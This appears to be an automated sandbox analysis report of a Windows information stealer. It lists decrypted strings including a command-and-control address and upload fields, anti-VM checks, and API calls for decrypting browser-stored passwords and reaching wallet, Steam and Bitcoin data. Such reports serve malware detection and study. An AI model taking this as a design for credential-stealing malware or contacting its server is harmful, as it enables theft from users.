Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: POST
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: hwid
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: build
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: token
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: file_name
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: file
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: message
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: screenshot.jpg
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Sleep
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sscanf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: http://85.28.47.31
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: silence
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sila
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32First
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindClose
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCW

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00418940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0040C660
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00407280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00409B10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C6E6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C83A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8344C0 PK11_PubEncrypt,	0_2_6C8344C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C804420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C804420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C834440 PK11_PrivDecrypt,	0_2_6C834440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C8825B0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ead6a72944.exe	Unpacked PE file: 28.2.ead6a72944.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61302 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb61252224y source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inisP~ source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbes source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831BSOFTWARE\WOW6432Node\Valve\Steams source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb612522248Software\Bitcoin\Bitcoin-Qtp source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004139B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004143F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	0_2_00414050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004133C0

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
